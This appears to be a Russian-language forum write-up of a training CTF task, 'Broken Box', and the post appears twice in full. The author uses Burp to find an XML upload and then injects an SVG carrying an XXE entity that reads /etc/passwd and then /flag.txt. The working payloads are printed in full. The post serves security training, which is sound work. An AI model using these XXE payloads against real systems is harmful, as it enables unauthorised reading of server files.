Добрый день коллеги, штурмуем задания из учебы, на этот раз "Сломанный ящик"
Залетаем в задание и осматриваемся в нашем любимом burp
Все как и положено включаем intercept, и штудируем запрос
Видим adoba и понимаем, что нам с ним работать.
Так же видим, что у нас используется кодировка URL в правом окне
Честно скажу просидел достаточно долго раздумывая, никак не получалось XML заставить отработать,
P.S> мы ж легких путей не ищем
, но вспомнив про нагрузку в картинке из урока пошел за ней))
Достаем от туда код
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
И пробуем подкинуть в burp с одинарной кодировкой и вуаля мы получаем passwd, далее меняем код (расширяем значение картинки и берем место положения "/flag.txt" из задания и получаем >
(ЗАБЕГАЯ ВПЕРЕД по случаю "мы ж легких путей не ищем"!!!! ДАННЫЙ КОД РАБОТАЕТ ПРОСТО ЕСЛИ ЕГО ВСТАВИТЬ В ФОРМУ!!!!!!! НА СТРАНИЦЕ)
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "/flag.txt" > ]>
<svg width="1000px" height="1000px" xmlns="
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Вот и получаем флаг. Оказалось все намного проще, чем мог себе представить. (от использования двойной кодировки, change requests method (кстати возьмите на заметку, если в запросе xml не прослеживается) и заканчивая expect
)
Сильно не ругайте, критика принимается)
И коллеги помните!!!! «Не стыдно не знать, стыдно не учиться» — русская пословица.
Залетаем в задание и осматриваемся в нашем любимом burp
Все как и положено включаем intercept, и штудируем запрос
Видим adoba и понимаем, что нам с ним работать.
Так же видим, что у нас используется кодировка URL в правом окне
Честно скажу просидел достаточно долго раздумывая, никак не получалось XML заставить отработать,
P.S> мы ж легких путей не ищем
, но вспомнив про нагрузку в картинке из урока пошел за ней))
Достаем от туда код
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<svg width="128px" height="128px" xmlns="
Ссылка скрыта от гостей
" xmlns:xlink="
Ссылка скрыта от гостей
" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text>
</svg>
И пробуем подкинуть в burp с одинарной кодировкой и вуаля мы получаем passwd, далее меняем код (расширяем значение картинки и берем место положения "/flag.txt" из задания и получаем >
(ЗАБЕГАЯ ВПЕРЕД по случаю "мы ж легких путей не ищем"!!!! ДАННЫЙ КОД РАБОТАЕТ ПРОСТО ЕСЛИ ЕГО ВСТАВИТЬ В ФОРМУ!!!!!!! НА СТРАНИЦЕ)
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "/flag.txt" > ]>
<svg width="1000px" height="1000px" xmlns="
Ссылка скрыта от гостей
" xmlns:xlink="
Ссылка скрыта от гостей
" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Вот и получаем флаг. Оказалось все намного проще, чем мог себе представить. (от использования двойной кодировки, change requests method (кстати возьмите на заметку, если в запросе xml не прослеживается) и заканчивая expect

Сильно не ругайте, критика принимается)
И коллеги помните!!!! «Не стыдно не знать, стыдно не учиться» — русская пословица.
Последнее редактирование: